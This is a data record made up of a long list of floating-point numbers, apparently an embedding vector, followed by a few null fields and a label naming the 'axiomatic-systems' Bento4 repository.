-0.0013619810342788696, 0.011675563640892506, 0.02637588419020176, -0.0030818916857242584, 0.010190071538090706, 0.014908692799508572, 0.007259417790919542, 0.007299747783690691, 0.006956941913813353, -0.01594383269548416, 0.002090443391352892, 0.008059297688305378, 0.01687142439186573, 0.006503228098154068, -0.00801224634051323, 0.008005524054169655, -0.004409424029290676, -0.026832958683371544, -0.000603271066211164, 0.003972514532506466, 0.016750434413552284, 0.007185479160398245, -0.029440971091389656, -0.004204412456601858, -0.018282977864146233, -0.014545721933245659, 0.002092123730108142, -0.00436237221583724, -0.020501133054494858, -0.01748981885612011, 0.0027760551311075687, 0.013967657461762428, -0.012327566742897034, 0.0027827767189592123, -0.002959220902994275, -0.019936511293053627, 0.014518835581839085, -0.009363303892314434, -0.002098845550790429, 0.011668841354548931, -0.01197131723165512, 0.018861042335629463, 0.004863137379288673, -0.01038500014692545, 0.017099961638450623, 0.014760815538465977, 0.017005857080221176, 0.022423533722758293, -0.0024416514206677675, -0.01301317848265171, -0.015137230046093464, -0.011507521383464336, -0.0016871424159035087, 0.006062957923859358, 0.007857647724449635, -0.000545296526979655, 0.014841475524008274, 0.004046453163027763, -0.012542660348117352, -0.026416214182972908, 0.006829229649156332, 0.0017098281532526016, -0.013093838468194008, 0.003693564794957638, 0.002016504993662238, -0.006019267253577709, 0.008906230330467224, -0.024950888007879257, 0.0031507888343185186, 0.005494975950568914, 0.00797191634774208, 0.008119792677462101, -0.0011124385055154562, 0.00429515540599823, -0.02099853754043579, 0.016454679891467094, -0.012838414870202541, -0.003147427923977375, 0.00635871198028326, -0.002846632618457079, -0.00635871198028326, -0.008516372181475163, -0.016199255362153053, -0.004066618159413338, -0.014102091081440449, -0.0046514044515788555, 0.016790764406323433, -0.0025155898183584213, -0.006415846291929483, 0.0011880574747920036, -0.01052615512162447, 0.025891922414302826, 0.011648676358163357, 0.013040064834058285, 0.009275922551751137, -0.029440971091389656, -0.0022702484857290983, 0.004049813840538263, -0.011883935891091824, 0.01898203231394291, 0.0037473381962627172, 0.02489711344242096, -0.009356582537293434, 0.0013208107557147741, 0.011225210502743721, 0.01869972236454487, -0.006815786473453045, 0.017005857080221176, 0.013678625226020813, 0.00013579899678006768, -0.01895514503121376, 0.0140752037987113, -0.011951152235269547, 0.008355052210390568, -0.01214608084410429, -0.012549381703138351, -0.0023475477937608957, -0.011924265883862972, -0.03817915916442871, -0.013550912961363792, -0.003575935261324048, 0.010620258748531342, -0.012293958105146885, -0.016723547130823135, 0.006257886998355389, -0.01925089955329895, -0.012845136225223541, 0.007729935459792614, 0.008664249442517757, 0.0019072775030508637, 0.02426527626812458, 0.00041359354509040713, -0.0003331433981657028, 0.0032566552981734276, 0.007353520952165127, -0.04301876947283745, 0.011278984136879444, 0.014142421074211597, 0.010452217422425747, 0.008939838036894798, 0.005720152053982019, -0.01898203231394291, 0.011857048608362675, -0.011225210502743721, -0.0016300081042572856, 0.010700919665396214, 0.0077635436318814754, -0.0038145550061017275, -0.01197131723165512, -0.013436644338071346, 0.007924864068627357, -0.009417077526450157, 0.0040565356612205505, -0.00740729458630085, 0.009927925653755665, 0.009228870272636414, 0.013275323435664177, -0.014155864715576172, 0.013416479341685772, -0.005263077560812235, 0.012993013486266136, 0.016978971660137177, -0.005962132941931486, -0.0016291679348796606, 0.002949138404801488, 0.010398443788290024, -0.008610475808382034, -0.00783748272806406, -0.014088647440075874, -0.012999734841287136, 0.023902304470539093, 0.011352922767400742, 0.03492586314678192, 0.00003195425233570859, -0.000030273829906946048, -0.021670706570148468, 0.007219087332487106, 0.0022920938208699226, -0.01950632408261299, -0.002997870557010174, 0.025286970660090446, 0.0024198058526962996, -0.008328164927661419, 0.0019828963559120893, 0.02102542482316494, -0.007454346399754286, 0.013819780200719833, 0.028661256656050682, -0.010371556505560875, 0.005273160059005022, -0.0017476375214755535, -0.007158592343330383, -0.014747372828423977, 0.011473912745714188, 0.01468015555292368, -0.01376600656658411, 0.013685346581041813, -0.0007725734612904489, -0.00429179472848773, -0.0021055671386420727, 0.006540197413414717, 0.006459537427872419, 0.014223081059753895, 0.021711036562919617, 0.0016552144661545753, 0.00429515540599823, 0.013288767077028751, -0.014975909143686295, -0.01038500014692545, 0.006883003283292055, 0.000009616470379114617, -0.007871090434491634, 0.02602635696530342, -0.013732397928833961, -0.007400572765618563, 0.0030113139655441046, 0.015096900053322315, -0.024103954434394836, -0.011198324151337147, 0.009047385305166245, 0.006879642605781555, 0.009894317016005516, -0.03194143623113632, -0.013120724819600582, 0.03869000822305679, 0.01683109439909458, -0.0037574206944555044, -0.0034078932367265224, 0.000258574727922678, -0.014545721933245659, 0.0056126052513718605, 0.004718621261417866, 0.007750100456178188, 0.0006969544920139015, 0.011722614988684654, -0.00273740547709167, -0.007998802699148655, 0.006977106910198927, -0.0015980801545083523, -0.013335819356143475, -0.01094962190836668, -0.03134993091225624, -0.006257886998355389, -0.002937375335022807, 0.016938641667366028, 0.016978971660137177, 0.015607748180627823, -0.0040598963387310505, 0.00010581398964859545, -0.02571715973317623, -0.01864594779908657, 0.013275323435664177, -0.02876880206167698, 0.01688486710190773, -0.04057207703590393, -0.005753760691732168, 0.00336588267236948, 0.01718062162399292, 0.03024757280945778, -0.005337016191333532, -0.0011292427079752088, 0.005790730006992817, -0.00422457791864872, -0.01390044018626213, -0.009988420642912388, -0.0029995511285960674, 0.0018955145496875048, 0.008113071322441101, -0.014007987454533577, 0.00429851608350873, 0.0103446701541543, -0.0050782314501702785, -0.016091708093881607, -0.017866233363747597, -0.007118262350559235, -0.007938307709991932, 0.0058344206772744656, -0.01719406433403492, -0.021213632076978683, 0.020944764837622643, 0.0007923183729872108, -0.005589079577475786, 0.007151870522648096, 0.006879642605781555, 0.026564091444015503, -0.01840396784245968, -0.004201051779091358, 0.006778817158192396, 0.00045077287359163165, -0.02042047306895256, -0.005239551886916161, 0.012609877623617649, -0.000481440540170297, -0.014586051926016808, 0.017704913392663002, -0.01627991534769535, 0.002068597823381424, -0.02275961823761463, -0.008502928540110588, -0.010304340161383152, 0.008623919449746609, 0.003770864102989435, 0.03143059089779854, -0.026590976864099503, -0.00816012267023325, -0.018874485045671463, -0.018887929618358612, -0.004607713781297207, -0.001915679662488401, 0.006278051994740963, -0.00828783493489027, -0.003912019543349743, 0.027908427640795708, 0.014908692799508572, 0.0030852523632347584, 0.012596433982253075, -0.026564091444015503, -0.006805703975260258, -0.021845469251275063, -0.004829529207199812, 0.019103022292256355, -0.009215427562594414, 0.007528285030275583, -0.0015577500453218818, 0.0003543587226886302, 0.003794390009716153, 0.004654765594750643, 0.0020400306675583124, -0.02727658860385418, -0.035463597625494, -0.00578736886382103, 0.0007133386097848415, -0.01982896402478218, 0.022894052788615227, 0.025233197957277298, 0.012663650326430798, 0.0125897116959095, 0.0007343438337557018, 0.01450539194047451, 0.02395607717335224, 0.00019083278311882168, -0.018282977864146233, 0.014828032813966274, 0.003214644966647029, 0.009302808903157711, 0.010136297903954983, -0.0016468123067170382, -0.004923632834106684, -0.03425369784235954, 0.007077932357788086, -0.0021307733841240406, 0.012791362591087818, 0.003216325305402279, 0.011924265883862972, 0.020595235750079155, -0.014747372828423977, -0.02484334073960781, -0.0027004361618310213, -0.00517233507707715, 0.006849395111203194, 0.009820378385484219, 0.026859844103455544, 0.0077164918184280396, -0.015863170847296715, 0.019116466864943504, -0.01837708055973053, 0.0025021464098244905, -0.009612007066607475, 0.005276521202176809, 0.0012552742846310139, -0.010035472922027111, 0.0031759950798004866, 0.022141223773360252, 0.006049514748156071, -0.015338880009949207, -0.0004381696926429868, 0.005000932142138481, -0.020662453025579453, -0.02222188375890255, -0.002819746034219861, -0.014317184686660767, 0.0032785008661448956, -0.013208107091486454, -0.011278984136879444, 0.004520331975072622, -0.00211564963683486, -0.0058814724907279015, -0.006889725103974342, -0.019775191321969032, 0.013483695685863495, 0.01394077017903328, 0.026819514110684395, -0.006714961025863886, -0.0016585752600803971, -0.01923745684325695, -0.0026046521961688995, 0.001160330488346517, -0.0010830311803147197, 0.03083908185362816, -0.03882443904876709, -0.017597366124391556, 0.00299450964666903, 0.030274460092186928, 0.017933450639247894, 0.016414349898695946, -0.009712832048535347, -0.011930987238883972, -0.010055637918412685, -0.006983828730881214, -0.013429922051727772, -0.01595727540552616, -0.01894170232117176, -0.0021173302084207535, -0.00473542558029294, -0.010633702389895916, 0.005666378885507584, -0.005494975950568914, -0.013376149348914623, 0.013712232932448387, 0.006536836735904217, -0.003589378669857979, 0.0035826570820063353, -0.011547851376235485, -0.0027542095631361008, 0.0018299781950190663, -0.008045854046940804, -0.0028751997742801905, 0.02101198025047779, 0.0031306238379329443, -0.022974712774157524, 0.007682883646339178, -0.00703088054433465, 0.015782510861754417, -0.005471449811011553, -0.010425330139696598, 0.0013913883594796062, 0.003076850436627865, -0.006298216991126537, -0.013806336559355259, -0.02132117748260498, -0.0012107430957257748, -0.023767871782183647, 0.0045942701399326324, 0.0060999272391200066, 0.015836285427212715, -0.007682883646339178, -0.02040702849626541, 0.0026517040096223354, -0.017825903370976448, 0.027357250452041626, 0.0019912985153496265, 0.024198058992624283, -0.023337682709097862, -0.005494975950568914, 0.006341907661408186, 0.011110941879451275, -0.002335784723982215, 0.016199255362153053, -0.004170804284512997, -0.023270465433597565, -0.0066376617178320885, 0.019008919596672058, 0.012643485330045223, -0.002703797072172165, -0.010190071538090706, 0.008227339945733547, -0.009121323935687542, -0.01837708055973053, -0.004809364210814238, 0.001450203126296401, 0.01438440103083849, -0.013369427062571049, 0.009578398428857327, -0.001568672712892294, 0.0005070669576525688, -0.0006469619693234563, 0.00873146578669548, -0.01127226185053587, 0.012152803130447865, 0.01715373434126377, 0.005488254129886627, 0.003680121386423707, -0.0206893403083086, 0.03234473988413811, 0.00466820877045393, 0.0030432420317083597, 0.008570145815610886, 0.026147346943616867, -0.005595800932496786, 0.014653269201517105, 0.0016997455386444926, -0.0028987256810069084, -0.0037641425151377916, -0.03366218879818916, -0.022410091012716293, 0.009376747533679008, 0.004026288166642189, 0.008980168029665947, -0.013147612102329731, -0.0017274725250899792, 0.0019795356784015894, -0.010163184255361557, 0.012703980319201946, -0.012045255862176418, 0.01774524338543415, -0.0005053865606896579, -0.01052615512162447, -0.007857647724449635, -0.022410091012716293, 0.012939239852130413, 0.014128977432847023, 0.012865301221609116, -0.013524025678634644, 0.01657566986978054, 0.01201164722442627, 0.001219985424540937, 0.010405165143311024, -0.019761748611927032, 0.023525889962911606, 0.006718322169035673, -0.01958698406815529, -0.004207773599773645, 0.011332757771015167, -0.0028617565985769033, 0.031188609078526497, 0.015231333673000336, 0.007252695970237255, -0.0013527387054637074, 0.019976841285824776, 0.008381938561797142, -0.007736657280474901, 0.014169307425618172, -0.004278351087123156, -0.005743678193539381, -0.00392546271905303, -0.017973780632019043, -0.0005079071852378547, 0.024426596239209175, 0.004728703759610653, 0.010042194277048111, -0.010405165143311024, -0.0017081476980820298, 0.03239851072430611, 0.019049249589443207, 0.006775456480681896, 0.0010645465226843953, -0.005968854296952486, 0.013127447105944157, -0.0018484628526493907, 0.0029642621520906687, 0.0034213366452604532, 0.01345008797943592, 0.004244742915034294, 0.007239252328872681, -0.01127226185053587, -0.00329698552377522, 0.009363303892314434, -0.00933641754090786, 0.0058781118132174015, 0.002283691894263029, 0.00797191634774208, -0.0021979904267936945, 0.015016240067780018, -0.002633219351992011, -0.0027542095631361008, -0.01244855672121048, -0.013591242954134941, -0.009087715297937393, 0.015056570060551167, -0.028822576627135277, -0.006956941913813353, -0.016441237181425095, 0.004214495420455933, 0.03713057562708855, 0.0043825372122228146, -0.008926395326852798, 0.015540530905127525, -0.0236737672239542, -0.00709809735417366, 0.0023626715410500765, -0.0035322443582117558, -0.019452549517154694, 0.014707041904330254, -0.008765074424445629, -0.0001477719924878329, 0.013214828446507454, -0.010586651042103767, -0.026738854125142097, -0.005817616358399391, -0.00584786431863904, -0.021751366555690765, 0.00859703216701746, -0.00422793859615922, 0.007642553653568029, 0.0007099777576513588, 0.00011384850222384557, 0.002203031675890088, 0.001811493537388742, 0.026254894211888313, 0.00976660568267107, 0.0045875487849116325, 0.011937708593904972, 0.007387129589915276, -0.002261846326291561, -0.02339145727455616, -0.018766939640045166, -0.013167777098715305, 0.01525822002440691, -0.02547517791390419, -0.000014034138985152822, -0.020501133054494858, -0.013604686595499516, -0.0015501881716772914, 0.022880608215928078, 0.009712832048535347, 0.02690017595887184, 0.0020030615851283073, 0.016347132623195648, -0.009827100671827793, -0.02462824620306492, -0.011789832264184952, -0.008751630783081055, 0.012078864499926567, 0.0033524392638355494, 0.003518800949677825, -0.005945328623056412, 0.00435901153832674, -0.024937443435192108, 0.010620258748531342, 0.014088647440075874, -0.011621790006756783, -0.011682284995913506, -0.006990550085902214, 0.019627314060926437, 0.0018619061447679996, -0.012912352569401264, 0.004990849643945694, -0.019640756770968437, 0.024117399007081985, -0.006136896554380655, 0.009376747533679008, -0.009692667052149773, 0.0221949964761734, -0.019318116828799248, -0.019156796857714653, 0.013429922051727772, 0.005326933693140745, 0.004453115165233612, -0.017409158870577812, -0.01718062162399292, 0.0013149292208254337, -0.0023845171090215445, -0.010936178267002106, 0.005337016191333532, -0.01714029163122177, 0.0021307733841240406, 0.007602223195135593, -0.010116132907569408, -0.004520331975072622, -0.027169043198227882, -0.00039741949876770377, 0.001067907433025539, -0.00828783493489027, -0.0028247872833162546, -0.0014359195483848453, -0.0034398213028907776, -0.0037977509200572968, -0.02250419370830059, 0.017059631645679474, 0.0236603245139122, 0.011211766861379147, -0.01157473772764206, 0.0061469790525734425, 0.001672018668614328, 0.014922136440873146, 0.006442733108997345, 0.027074938639998436, -0.005212665069848299, 0.011346200481057167, 0.0007868569809943438, -0.007514841388911009, 0.0003713729965966195, -0.010835353285074234, -0.009672502055764198, -0.004792559891939163, -0.0096052847802639, 0.0030365202110260725, 0.006802343297749758, 0.03134993091225624, 0.027061495929956436, 0.010089246556162834, -0.001333413878455758, -0.00598901929333806, -0.03317822515964508, 0.004133834969252348, 0.01508345641195774, -0.0021610211115330458, -0.01957354135811329, -0.014733929187059402, 0.019734861329197884, 0.006183948367834091, 0.005605883430689573, -0.0118436049669981, -0.028957009315490723, -0.02868814207613468, -0.0019190404564142227, 0.018740052357316017, -0.0008015607018023729, 0.007508120033890009, -0.0022568050771951675, -0.027357250452041626, 0.0039052977226674557, 0.016199255362153053, -0.0029088081791996956, -0.00042619669693522155, 0.015029682777822018, 0.01864594779908657, 0.001008252496831119, -0.029225876554846764, -0.0027105186600238085, -0.015150673687458038, 0.015795955434441566, -0.004963962826877832, 0.006909890100359917, -0.0046514044515788555, 0.005968854296952486, 0.011776388622820377, 0.008664249442517757, -0.010270731523633003, 0.002041711239144206, 0.016965527087450027, 0.017973780632019043, 0.0236603245139122, 0.0026147346943616867, -0.012381340377032757, 0.027128713205456734, -0.00010476372699486092, -0.00872474443167448, 0.014397844672203064, -0.023337682709097862, 0.01349041797220707, 0.006714961025863886, 0.0032432121224701405, -0.022853722795844078, -0.014787702821195126, 0.004560661967843771, 0.016495009884238243, 0.011863769963383675, -0.011547851376235485, 0.01127226185053587, -0.002283691894263029, 0.028365502133965492, 0.0022551247384399176, 0.0005658816662617028, -0.016481567174196243, 0.0004490924475248903, 0.011211766861379147, 0.004520331975072622, 0.018565287813544273, -0.0281504075974226, 0.011601625010371208, -0.0044900840148329735, 0.01231412310153246, -0.0018619061447679996, 0.007319912780076265, 0.049928661435842514, -0.006563723552972078, -0.01494902279227972, -0.02903767116367817, 0.013234993442893028, 0.009685944765806198, -0.00517569575458765, 0.00740729458630085, -0.0012905631447210908, 0.005743678193539381, -0.0039052977226674557, 0.0025239919777959585, -0.005515140946954489, -0.0031020566821098328, 0.030623987317085266, -0.010808466002345085, -0.0010401804465800524, 0.006405763793736696, 0.004748869221657515, -0.016642887145280838, 0.015903502702713013, -0.016091708093881607, 0.010835353285074234, -0.01863250508904457, 0.016535339877009392, 0.013134168460965157, 0.00460099196061492, 0.000666706939227879, -0.016952084377408028, -0.006509949918836355, -0.005770565010607243, 0.0021862273570150137, -0.0009847265901044011, 0.026174234226346016, -0.01744948886334896, 0.008045854046940804, -0.008543259464204311, 0.008556702174246311, 0.020380143076181412, 0.02047424577176571, -0.0010200153337791562, -0.004637961275875568, 0.023472117260098457, -0.00473878625780344, -0.001208222471177578, 0.001903916709125042, -0.005904998630285263, -0.005689904559403658, -0.028903236612677574, 0.0020148244220763445, 0.006395681295543909, 0.010680753737688065, -0.01463982556015253, 0.014088647440075874, 0.004842972382903099, 0.027693333104252815, 0.014599495567381382, -0.004708538763225079, 0.033877283334732056, 0.004130474291741848, -0.002624817192554474, -0.02876880206167698, -0.007151870522648096, 0.0011082374257966876, 0.022450421005487442, 0.012495609000325203, -0.024050181731581688, -0.002833189442753792, -0.001672858837991953, 0.002853354439139366, -0.008314722217619419, -0.008872621692717075, 0.011877213604748249, -0.007635831832885742, 0.006483063101768494, 0.02723625861108303, -0.018605617806315422, -0.01633368991315365, 0.016212699934840202, -0.002692034002393484, -0.010317782871425152, -0.00554874911904335, 0.0005444562993943691, -0.006015906110405922, 0.004822807386517525, 0.0031491084955632687, -0.016992414370179176, 0.00011342840298311785, -0.02165726199746132, -0.0006940137827768922, 0.01809477061033249, -0.01376600656658411, 0.02433249168097973, -0.031027289107441902, -0.019694531336426735, 0.009376747533679008, -0.019465994089841843, 0.02550206519663334, 0.010452217422425747, 0.0009906080085784197, 0.002747487975284457, -0.015486757270991802, -0.010613537393510342, 0.007528285030275583, 0.0057772863656282425, -0.011373087763786316, -0.004258186090737581, 0.006271330174058676, -0.007877812720835209, -0.004557300824671984, 0.023203250020742416, -0.018269535154104233, 0.020810330286622047, 0.00311045884154737, -0.019936511293053627, 0.014532278291881084, -0.006943498272448778, 0.011366365477442741, 0.010613537393510342, -0.042507924139499664, -0.008408824913203716, 0.006516671739518642, -0.011662119999527931, -0.010754692368209362, 0.0002701276389416307, -0.024977773427963257, -0.0019526488613337278, -0.01511034369468689, -0.00754172820597887, 0.00017318836762569845, -0.019734861329197884, 0.01081518828868866, 0.014007987454533577, 0.009269201196730137, 0.009215427562594414, -0.004809364210814238, 0.004459836520254612, -0.0019560097716748714, 0.00875835306942463, 0.007884534075856209, 0.019398776814341545, 0.015311993658542633, 0.0029524993151426315, -0.014733929187059402, 0.003342356765642762, -0.006392320618033409, 0.02163037657737732, -0.011588181369006634, 0.017866233363747597, -0.00842226855456829, 0.0024114036932587624, 0.006785538978874683, 0.01626647263765335, 0.013409757055342197, 0.006983828730881214, 0.01750326156616211, 0.00871802307665348, 0.001961051020771265, 0.012730867601931095, 0.01199820451438427, 0.00934313889592886, 0.008973446674644947, -0.0026785905938595533, -0.0031407063361257315, -0.004644683096557856, 0.006550279911607504, 0.012851857580244541, 0.0050815921276807785, 0.03473765775561333, 0.009954812005162239, -0.01603793539106846, -0.002438290510326624, -0.00554538844153285, -0.00797191634774208, 0.007178757339715958, -0.011205045506358147, -0.007259417790919542, -0.0003705327690113336, -0.007514841388911009, 0.008778518065810204, 0.0014796104514971375, 0.01375928521156311, 0.006644383538514376, 0.0005385748227126896, -0.015809398144483566, -0.013725676573812962, -0.018282977864146233, -0.0022702484857290983, -0.012603155337274075, -0.021495942026376724, -0.0012964445631951094, -0.020850660279393196, 0.011809997260570526, -0.012240184471011162, -0.00292561249807477, 0.00038607665919698775, 0.016400907188653946, 0.006362073123455048, 0.00459763128310442, -0.003414614824578166, 0.003606182988733053, -0.027061495929956436, 0.0043825372122228146, 0.0002957540564239025, 0.024399708956480026, 0.012905631214380264, -0.019183682277798653, 0.0049135503359138966, -0.006338546983897686, -0.021495942026376724, -0.003332274267449975, 0.0015930389054119587, 0.0031491084955632687, -0.006688074674457312, 0.010573207400739193, 0.015486757270991802, 0.009087715297937393, 0.011850327253341675, -0.012831692583858967, 0.008825569413602352, -0.00218118610791862, 0.028338614851236343, 0.014626381918787956, -0.0009225509711541235, -0.012414948083460331, -0.0017980501288548112, 0.02157660201191902, 0.02696739137172699, -0.006997271906584501, 0.02159004472196102, -0.0017341942293569446, -0.011668841354548931, -0.00598901929333806, -0.002075319644063711, -0.013913883827626705, 0.0024315686896443367, -0.004533775150775909, -0.006049514748156071, -0.01390044018626213, -0.010781579650938511, 0.019707974046468735, -0.0007045163656584918, -0.0155539745464921, -0.03285558521747589, 0.013712232932448387, 0.008126514963805676, 0.0015468272613361478, -0.012509051710367203, -0.006284773349761963, -0.001568672712892294, -0.005995741114020348, -0.00920198392122984, 0.0027105186600238085, 0.00703760189935565, 0.013604686595499516, 0.0177990160882473, -0.00709809735417366, 0.01658911257982254, 0.012260349467396736, -0.00703760189935565, -0.014102091081440449, 0.01661599986255169, 0.006210835184901953, -0.0035624918527901173, -0.0110974982380867, -0.015406097285449505, 0.01228051446378231, 0.010674032382667065, 0.009517903439700603, 0.00964561477303505, 0.009255757555365562, -0.019976841285824776, -0.011910822242498398, -0.003622987074777484, 0.00033629420795477927, 0.03148436173796654, -0.009874152019619942, -0.015043126419186592, -0.004900106694549322, 0.007245974149554968, -0.0103513915091753, -0.028042860329151154, 0.003214644966647029, 0.009282643906772137, 0.03941594809293747, 0.008778518065810204, 0.019465994089841843, 0.015930388122797012, 0.006479702424257994, 0.009255757555365562, 0.005797451362013817, 0.00828111357986927, 0.015446427278220654, 0.03616265580058098, 0.023579664528369904, 0.009175097569823265, 0.0058781118132174015, -0.0031961603090167046, 0.019734861329197884, 0.00467156944796443, -0.027128713205456734, 0.004940437152981758, 0.02017849311232567, -0.032748039811849594, -0.006610775366425514, 0.010418608784675598, 0.02691361866891384, 0.0207834430038929, -0.012220019474625587, -0.009618728421628475, -0.014411288313567638, 0.015594304539263248, 0.024345936253666878, -0.006909890100359917, -0.008072741329669952, -0.008442433550953865, 0.036592841148376465, -0.01170917134732008, -0.014424731954932213, 0.03352775424718857, -0.00845587719231844, -0.0031558300834149122, 0.014626381918787956, 0.01537921093404293, 0.008697858080267906, 0.016400907188653946, -0.0019442468183115125, -0.01801411062479019, 0.04347584396600723, 0.015849728137254715, -0.0036162654869258404, -0.008966725319623947, 0.008375217206776142, -0.014263411052525043, -0.014263411052525043, 0.02847304940223694, 0.002853354439139366, -0.000988087384030223, -0.024762680754065514, 0.0012015008833259344, 0.0016627763397991657, 0.0037540600169450045, -0.006711600348353386, 0.004180886782705784, -0.00598565861582756, 0.002124051796272397, -0.01213263813406229, 0.008139957673847675, -0.018887929618358612, 0.010835353285074234, 0.016387462615966797, 0.008623919449746609, -0.006348629482090473, -0.023525889962911606, 0.011467191390693188, 0.021697591990232468, 0.014128977432847023, -0.011070611886680126, -0.012475444003939629, 0.0009292726754210889, -0.03476454317569733, -0.012630042620003223, -0.007911420427262783, 0.013597964309155941, 0.0033692435827106237, 0.022436978295445442, -0.014532278291881084, 0.018121657893061638, -0.016938641667366028, -0.004611074458807707, 0.00336588267236948, -0.012381340377032757, 0.013255158439278603, 0.02313603274524212, -0.004933715332299471, 0.00844915583729744, 0.011581460013985634, 0.01170244999229908, 0.004893385339528322, -0.03352775424718857, 0.009806935675442219, 0.0010847116354852915, -0.003774225013330579, -0.001382146030664444, -0.012058699503540993, -0.01863250508904457, 0.012408226728439331, 0.0008267670054920018, -0.023189805448055267, 0.01139325276017189, -0.004967323504388332, 0.02427871897816658, 0.024816453456878662, -0.015876615419983864, 0.022611740976572037, 0.00292729283683002, 0.003402851987630129, 0.012623320333659649, -0.012421670369803905, 0.01626647263765335, -0.009484294801950455, 0.00666118785738945, -0.011554572731256485, -0.01863250508904457, -0.01871316507458687, -0.0032667377963662148, -0.006567084230482578, -0.0019022362539544702, -0.022410091012716293, 0.00011857468780362979, -0.013873553834855556, -0.015822840854525566, 0.027935314923524857, -0.01038500014692545, 0.006489784922450781, 0.004500166513025761, -0.012999734841287136, 0.003120541339740157, 0.009685944765806198, 0.025838149711489677, 0.009356582537293434, -0.01345680933445692, 0.016790764406323433, 0.0034330994822084904, -0.001323331380262971, 0.03108106181025505, -0.00024660173221491277, -0.029521631076931953, -0.00025458374875597656, -0.010875683277845383, 0.012408226728439331, 0.019398776814341545, 0.00872474443167448, 0.021200187504291534, -0.0008687775116413832, -0.0034162953961640596, 0.006745208986103535, 0.0022568050771951675, 0.033904168754816055, 0.011689006350934505, 0.017247838899493217, 0.0011418459471315145, -0.0103513915091753, -0.00033440373954363167, -0.013678625226020813, -0.00934313889592886, 0.043690938502550125, 0.0023391456343233585, 0.008166844956576824, -0.0058814724907279015, -0.007252695970237255, -0.0010645465226843953, -0.0017274725250899792, -0.016992414370179176, 0.0002682371705304831, 0.01746293157339096, -0.00797191634774208, -0.011379809118807316, 0.013517304323613644, -0.017583923414349556, -0.002797900466248393, -0.00797191634774208, 0.008933116681873798, -0.009659058414399624, -0.011413417756557465, -0.009040663950145245, 0.0032348099630326033, -0.0014997755642980337, 0.02491055615246296, -0.011924265883862972, 0.0033171505201607943, 0.0045942701399326324, 0.0024920639116317034, -0.006590609904378653, 0.01603793539106846, -0.02427871897816658, 0.019170239567756653, 0.005189139395952225, -0.015352323651313782, 0.0192105695605278, 0.01346353068947792, 0.017987223342061043, 0.0096052847802639, 0.018269535154104233, -0.008798683062195778, -0.003387728240340948, 0.004503527656197548, 0.009813657030463219, -0.025058433413505554, -0.010304340161383152, 0.014290298335254192, -0.0015148993115872145, 0.00013023261271882802, 0.0038246375042945147, 0.010304340161383152, 0.023297352716326714, 0.00828783493489027, -0.01200492586940527, -0.0003732634650077671, 0.026819514110684395, -0.017032744362950325, 0.022920938208699226, 0.02250419370830059, -0.012818248942494392, -0.012925796210765839, -0.005740317050367594, -0.004886663518846035, -0.02488367073237896, -0.015446427278220654, 0.012730867601931095, -0.019425664097070694, 0.0028063026256859303, 0.0026517040096223354, 0.008052576333284378, -0.003942267037928104, 0.02394263446331024, -0.002470218576490879, 0.0018198956968262792, -0.004355650395154953, 0.005306768696755171, -0.003006272716447711, 0.00585122499614954, 0.0019812160171568394, -0.008845734409987926, 0.00399267952889204, -0.008523093536496162, -0.0006528434460051358, -0.02309570275247097, 0.009141488932073116, -0.007212365977466106, 0.004510249476879835, -0.004130474291741848, -0.016535339877009392, 0.009141488932073116, -0.007649275008589029, 0.017812460660934448, 0.018887929618358612, 0.00919526256620884, -0.009739718399941921, 0.0018938342109322548, 0.009813657030463219, -0.015916945412755013, -0.008301278576254845, 0.0006209154380485415, 0.012556103989481926, 0.0021307733841240406, 0.009571676142513752, -0.007723213639110327, -0.013873553834855556, -0.0019240817055106163, 0.0025592807214707136, 0.008079462684690952, 0.0036498738918453455, -0.012771197594702244, -0.01157473772764206, 0.006788899656385183, 0.017879676073789597, -0.0013300529681146145, -0.01989618130028248, 0.00029281331808306277, 0.003928823862224817, -0.020528020337224007, -0.005861307494342327, -0.0012393102515488863, 0.008166844956576824, -0.013308932073414326, 0.013557634316384792, 0.012804806232452393, 0.01152768637984991, 0.0030197161249816418, 0.02606668695807457, 0.012925796210765839, 0.003538966178894043, 0.007266139145940542, 0.005652935244143009, 0.02279994823038578, 0.02195301651954651, 0.0016182451508939266, 0.013604686595499516, 0.0015518685104325414, 0.013429922051727772, 0.012509051710367203, -0.02460135892033577, 0.028957009315490723, 0.0020467524882405996, -0.0006196551257744431, 0.012260349467396736, 0.04551923647522926, -0.01722095161676407, -0.011453747749328613, -0.004268268588930368, 0.008005524054169655, 0.006923333276063204, 0.006883003283292055, -0.003056685207411647, -0.019129909574985504, 0.01988273859024048, 0.010613537393510342, 0.01871316507458687, 0.013476974330842495, -0.01065386738628149, 0.0004969844594597816, -0.0033961303997784853, 0.02901078388094902, 0.004510249476879835, 0.0026718690060079098, -0.018511515110731125, -0.002253444166854024, 0.003218005644157529, 0.018188873305916786, -0.0002046962472377345, 0.01170917134732008, 0.017812460660934448, -0.02485678344964981, -0.008213896304368973, -0.010277452878654003, 0.0017224312759935856, -0.004473280161619186, 0.009712832048535347, -0.0027592508122324944, 0.013423200696706772, 0.00016289578343275934, 0.011252096854150295, -0.019089579582214355, 0.007729935459792614, 0.011198324151337147, -0.007501398213207722, 0.03823293372988701, -0.013846666552126408, 0.0004566543211694807, 0.035382937639951706, 0.0007087174453772604, -0.01574218086898327, 0.01468015555292368, 0.008670970797538757, 0.004705178085714579, -0.009759883396327496, -0.024776123464107513, 0.023283910006284714, -0.003007953055202961, -0.01657566986978054, 0.0003482672036625445, 0.03178011626005173, -0.009080993942916393, 0.02841927483677864, -0.005357181187719107, -0.009134767577052116, -0.020944764837622643, -0.005219386890530586, 0.021832026541233063 ]
7
null
null
null
null
null
null
null
null
null
[ "axiomatic-systems", "Bento4" ]
